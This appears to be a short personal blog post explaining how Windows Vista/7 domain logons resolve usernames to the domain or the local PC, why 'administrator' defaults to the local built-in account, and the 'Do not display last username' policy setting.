Notice the part where it says “Log on to: BEAUTISEC”? Well, BEAUTISEC is my domain and you can skip the BEAUTISEC\username way of logging on and just go with username. If you want to log on to other than BEAUTISEC domain, do/see this …

So, lets say I've got a domain called MSFT, i would need to do the MSFT\domain user  and log on that way. But since i am in my primary domain i.e. BEAUTISEC, i don’t have to, i just logon.

I log on user sanjay and my password just like that works. But, when i log on as administrator, it doesn’t. Here’s why:

For administrator accounts

In the above scenario, local administrator logons will take precedence unless you specify the domain preceding the logon name like BEAUTISEC\administrator which is your domain administrator account. Then you get to logon as the domain “administrator” account.

See this screen below when i key in administrator (NOTE: The administrator here is the default built in administrator user for that PC, it could be renamed as admin or papasmurf and the effect below is still the same)

The “Log on to” value is automatically set to BEAUTIFULPC, which is the local PC name i.e logon locally. This “feature” can also help someone figure out what is the local built in admin account even before logging on, but yea..moving on..

For regular accounts

Domain logons will always take precedence unless you specify BEAUTIFULPC\<username> to log on to local accounts or in other words, other than the built-in administrator account. (See my note above about the local admin account)

The Log on to value automatically changes to my domain BEAUTISEC.

SIDE NOTE: You can’t change to classic logon interface for Vista/Windows 7 machines like how you see in XP for machines that are part of the domain. But you can enable the Interactive Logon: Do not display last username directive through registry or GPO (or GPEDIT locally). That shall let you enter your username manually but still no domain pulldowns… like in old days. ):